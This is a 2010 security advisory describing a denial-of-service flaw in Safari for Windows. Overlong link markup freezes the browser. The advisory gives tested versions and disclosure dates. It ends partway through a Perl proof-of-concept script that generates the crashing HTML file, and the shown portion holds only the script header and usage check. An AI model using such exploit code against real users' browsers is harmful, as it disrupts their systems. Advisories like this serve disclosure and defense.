|
############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified:Yes exploit available: YES
############################################
Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like
click here or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
windows 7 Ultimate:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
####################
Proof Of Concept
####################
#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0